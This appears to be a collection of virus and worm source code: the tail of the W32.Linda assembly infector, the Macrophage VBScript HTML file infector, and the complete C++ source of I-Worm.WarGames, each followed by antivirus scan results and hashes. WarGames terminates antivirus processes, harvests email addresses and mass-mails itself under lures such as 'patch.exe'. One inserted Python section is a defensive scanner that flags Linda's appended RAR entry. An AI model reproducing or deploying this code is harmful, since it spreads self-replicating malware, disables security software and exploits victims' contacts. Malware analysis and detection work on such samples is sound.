infecthtm:
push offset ffile.cFileName
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je end_inf_htm
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
e_htm:
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
push 1 or 20h
push offset ffile.cFileName
api SetFileAttributesA
end_inf_htm:
ret

infect: xor eax,eax
push eax
push 80h
push 3
push eax
push eax
push 40000000h
lea eax,ffile.cFileName
push eax
api CreateFileA
dec eax
jz end_infect
inc eax
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek ; like SetFilePointer

mov esi,dword ptr [mHnd]
mov edi,Size
call CRC32
mov dword ptr [RARCrc32],eax

mov esi,offset RARHeader+2
mov edi,HeaderSize-2
call CRC32
mov word ptr [RARHeaderCRC],ax
xor eax,eax
push eax
push offset octets
push HeaderSize
push offset RARHeader
push dword ptr [fHnd]
api WriteFile

mov dword ptr [RARHeaderCRC],0
mov dword ptr [RARCrc32],0
mov dword ptr [RARCrc32+2],0
push 0
push offset octets
push Size
push dword ptr [mHnd]
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
end_infect:
ret

CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
File w32linda32.exe received on 05.16.2009 19:48:06 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Petik.worm.8192.C
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AP1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!c1a4
Avast 4.8.1335.0 2009.05.15 Win32:Agent-XPK
AVG 8.5.0.336 2009.05.15 Worm/Linda
BitDefender 7.2 2009.05.16 Win32.Linda.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Win32.Linda
Comodo 1157 2009.05.08 Worm.Win32.Petik.Linda
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.4096
eSafe 7.0.17.0 2009.05.14 Win32.Petik
eTrust-Vet 31.6.6508 2009.05.16 HTML/Linad
F-Prot 4.4.4.56 2009.05.16 W32/Malware!c1a4
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik!worm.p2p
GData 19 2009.05.16 Win32.Linda.A
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/Linda.worm
McAfee+Artemis 5616 2009.05.15 W32/Linda.worm
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AP1
Microsoft 1.4602 2009.05.16 Worm:Win32/Linra.A
NOD32 4080 2009.05.15 Win32/Petik.Linda
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.E
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Univ.AP.F
PCTools 4.4.2.0 2009.05.16 Worm.Petik
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.a
Sophos 4.41.0 2009.05.16 W32/Petik-S
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik
TrendMicro 8.950.0.1092 2009.05.15 PE_LINDA.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.8192
VirusBuster 4.6.5.0 2009.05.16 Worm.Petik.AG

Additional information
File size: 8192 bytes
MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c
SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c
PEiD..: ASPack v2.12
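Linda above appends a stored RAR 2.x file entry (type 74h, flags 8000h, method 30h, name LINDA32.EXE, 8192 bytes packed and unpacked) to the end of each archive, with HEAD_CRC computed by its own CRC32 routine over the header bytes after the CRC field. The Python below is an added defender-side scanner, not code from the original archive, and every name in it is this example's own: it walks the block chain of a constructed sample archive (a zero-filled placeholder stands in for the appended image), verifies each file header's CRC and reports which entries match the Linda signature, including when the appended body is truncated.

```python
"""Walk a RAR 2.x block chain and flag the stored LINDA32.EXE entry W32.Linda appends.

Added defender-side example, not part of the original archive. The header layout
follows the RARHeader structure in the Linda source above. The sample archive is
constructed here with a zero-filled placeholder body, not any real binary.
"""
import struct
import zlib

RAR_MARKER = b"Rar!\x1a\x07\x00"      # marker block (type 72h), 7 bytes
MAIN_HEAD = 0x73
FILE_HEAD = 0x74
LONG_BLOCK = 0x8000                   # HEAD_FLAGS bit: block carries a data body
FILE_FIXED = "<HBHHIIBIIBBHI"         # fixed part of a file header, 32 bytes
LINDA_NAME = b"LINDA32.EXE"
LINDA_SIZE = 8192
METHOD_STORED = 0x30


def header_crc_ok(block: bytes) -> bool:
    """HEAD_CRC is the low 16 bits of CRC32 over the header bytes after it,
    the same computation the CRC32 routine in the Linda source performs."""
    stored = struct.unpack_from("<H", block, 0)[0]
    return (zlib.crc32(block[2:]) & 0xFFFF) == stored


def parse_file_header(data: bytes, off: int) -> dict:
    """Decode the file header (type 74h) that starts at `off`."""
    (_crc, _type, _flags, head_size, pack_size, unp_size, _os, file_crc,
     _ftime, _ver, method, name_size, _attr) = struct.unpack_from(FILE_FIXED, data, off)
    fixed = struct.calcsize(FILE_FIXED)
    return {
        "offset": off,
        "head_size": head_size,
        "name": data[off + fixed: off + fixed + name_size],
        "pack_size": pack_size,
        "unp_size": unp_size,
        "method": method,
        "file_crc": file_crc,
        "crc_ok": header_crc_ok(data[off:off + head_size]),
    }


def is_linda_entry(f: dict) -> bool:
    """The appended entry: stored, 8192 bytes packed and unpacked, named LINDA32.EXE."""
    return (f["name"] == LINDA_NAME and f["method"] == METHOD_STORED
            and f["pack_size"] == LINDA_SIZE and f["unp_size"] == LINDA_SIZE)


def scan_rar(data: bytes) -> list:
    """Return one record per file block, in archive order, with a `linda` verdict."""
    if not data.startswith(RAR_MARKER):
        raise ValueError("not a RAR archive")
    findings = []
    off = len(RAR_MARKER)
    while off + 7 <= len(data):
        head_type, flags, head_size = struct.unpack_from("<BHH", data, off + 2)
        if head_size < 7 or off + head_size > len(data):
            raise ValueError(f"corrupt or truncated block header at offset {off}")
        if head_type == FILE_HEAD:
            f = parse_file_header(data, off)
            f["linda"] = is_linda_entry(f)
            # Linda seeks to the end of the archive, so its entry is the last
            # block; an archive cut short will show a truncated body here.
            f["body_truncated"] = off + head_size + f["pack_size"] > len(data)
            findings.append(f)
            off += head_size + f["pack_size"]
        else:
            # Other LONG_BLOCK blocks carry ADD_SIZE right after HEAD_SIZE.
            add_size = struct.unpack_from("<I", data, off + 7)[0] if flags & LONG_BLOCK else 0
            off += head_size + add_size
    return findings


def build_file_block(name: bytes, body: bytes) -> bytes:
    """Constructed stored (method 30h) file block with a valid HEAD_CRC.
    0x24317863 is the FTIME/FDATE value Linda stamps (bytes 63 78 31 24)."""
    head = struct.pack(FILE_FIXED, 0, FILE_HEAD, LONG_BLOCK, 32 + len(name), len(body),
                       len(body), 0, zlib.crc32(body) & 0xFFFFFFFF, 0x24317863, 0x14,
                       METHOD_STORED, len(name), 0) + name
    head = struct.pack("<H", zlib.crc32(head[2:]) & 0xFFFF) + head[2:]
    return head + body


def build_main_header() -> bytes:
    """Constructed archive header (type 73h, 13 bytes)."""
    body = struct.pack("<BHHHI", MAIN_HEAD, 0, 13, 0, 0)
    return struct.pack("<H", zlib.crc32(body) & 0xFFFF) + body


def sample_archive() -> bytes:
    """Constructed sample: one clean stored file, then a Linda-style entry."""
    clean = build_file_block(b"readme.txt", b"hello from a clean archive\n")
    linda = build_file_block(LINDA_NAME, bytes(LINDA_SIZE))  # placeholder body
    return RAR_MARKER + build_main_header() + clean + linda


if __name__ == "__main__":
    for f in scan_rar(sample_archive()):
        print(f"{f['offset']:6} {f['name'].decode():14} crc_ok={f['crc_ok']} linda={f['linda']}")
```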
<macrophage>
<html><head><title>Internet Explo$er</title></head><body>
<script language=vbscript>
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
If err.number=429 then
document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and click Yes</font>"
Else

Set ws=CreateObject("WScript.Shell")
cache=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
cook=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies")
desk=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
favor=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Favorites")
pers=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(cache)
infect(cook)
infect(desk)
infect(favor)
infect(pers)

If Day(Now())=10 Then
document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't read this page.<br>Try an another day.<br></font>"
document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE DAY.</font>"
End If

End If

Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<macrophage>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<macrophage>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script></html>
File Macrophage.htm received on 05.16.2009 17:51:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.Good
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Petik.K
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Rophage.A
BitDefender 7.2 2009.05.16 VBS.Petik.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Macrophage
eSafe 7.0.17.0 2009.05.14 VBS.Petik.a.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.K
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.K
GData 19 2009.05.16 VBS.Petik.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Rophage
McAfee+Artemis 5616 2009.05.15 VBS/Rophage
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.Good
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 VBS/Petik.B
Norman 6.01.05 2009.05.16 VBS/Petik.C
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A
Panda 10.0.0.14 2009.05.16 HTML/Mage
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Prepend
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A

Additional information
File size: 2226 bytes
MD5...: fee8a8a543264ddb70fa00cfbd10625b
SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22nd 2002
Language : C++/Win32asm
*/

#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline

char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
LPSTR SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;

LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
WIN32_FIND_DATA ffile;
PROCESSENTRY32 uProcess;
HKEY hReg;
SYSTEMTIME wartime;

void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// Kill Some AntiVirus
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm

// Kill Some Worm
StopAV("KERN32.EXE"); // I-Worm.Badtrans
StopAV("SETUP.EXE"); // I-Worm.Cholera
StopAV("RUNDLLW32.EXE"); // I-Worm.Gift
StopAV("GONER.SCR"); // I-Worm.Goner
StopAV("LOAD.EXE"); // I-Worm.Nimda
StopAV("INETD.EXE"); // I-Worm.Plage - BadTrans
StopAV("FILES32.VXD"); // I-Worm.PrettyPark
StopAV("SCAM32.EXE"); // I-Worm.Sircam
StopAV("GDI32.EXE"); // I-Worm.Sonic
StopAV("_SETUP.EXE"); // I-Worm.ZippedFiles
StopAV("EXPLORE.EXE"); // I-Worm.ZippedFiles
StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles

GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);

randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:

hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);

_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0

end_all_asm:
}

FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");

vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");

(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Re: Fw:";
mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
"I send you a nice program. Look at this.\n\n"
" See you soon.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;
mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName=filename;
mes->lpFiles->lpszFileName="funny.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}

void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}

void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;

hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;

hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}

mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}

i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}

if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}

void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
wsprintf(subj,"Mail to %s.",tos);
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject=subj;
mess.lpszNoteText="I send you this patch.\n"
"It corrects a bug into Internet Explorer and Outlook.\n\n"
" Have a nice day. Best Regards.";

mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;

mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;

mess.lpOriginator=&from;

mSendMail(0,0,&mess,0,0);

free(mess.lpRecips);
free(mess.lpFiles);
}

void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
File WarGames.exe received on 05.16.2009 19:57:59 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Wargam!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/Warga.worm.77824
AntiVir 7.9.0.168 2009.05.15 Worm/WarGame.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!6ca1
Avast 4.8.1335.0 2009.05.15 Win32:Wargam-B
AVG 8.5.0.336 2009.05.15 I-Worm/Wargames
BitDefender 7.2 2009.05.16 Win32.WarGames.A@mm
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Wargam
ClamAV 0.94.1 2009.05.16 Worm.Wargam
Comodo 1157 2009.05.08 Worm.Win32.Warga.A
DrWeb 5.0.0.12182 2009.05.16 Win32.HLLM.Warga
eSafe 7.0.17.0 2009.05.14 Win32.Wargam
eTrust-Vet 31.6.6508 2009.05.16 Win32/Wargam
F-Prot 4.4.4.56 2009.05.16 W32/Malware!6ca1
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Wargam
Fortinet 3.117.0.0 2009.05.16 W32/Wargam.A@mm
GData 19 2009.05.16 Win32.WarGames.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Wargam
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Wargam
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Wargam
McAfee 5616 2009.05.15 W32/Warga@MM
McAfee+Artemis 5616 2009.05.15 W32/Warga@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.WarGame.1
Microsoft 1.4602 2009.05.16 Worm:Win32/Wargam.A@mm
NOD32 4080 2009.05.15 Win32/Warga.A
Norman 6.01.05 2009.05.16 W32/Pet_Tick.77824.A
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Worgam.77824
Panda 10.0.0.14 2009.05.16 W32/Wargam
PCTools 4.4.2.0 2009.05.16 I-Worm.Petwrg.A
Prevx 3.0 2009.05.16 High Risk Worm
Rising 21.29.52.00 2009.05.16 Worm.Wargames
Sophos 4.41.0 2009.05.16 W32/Warga-A
Sunbelt 3.2.1858.2 2009.05.16 W32.Wargam.Worm
Symantec 1.4.4.12 2009.05.16 W32.Wargam.Worm
TheHacker 6.3.4.1.326 2009.05.15 W32/Wargam
TrendMicro 8.950.0.1092 2009.05.15 WORM_WARGA.A
VBA32 3.12.10.5 2009.05.16 Win32.HLLW.Wargames
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Wargame
VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petwrg.A

Additional information
File size: 77824 bytes
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67
<html><head><title>Love Linda</title>
<body bgColor=blue onLoad="window.status='I LOVE YOU Linda'">
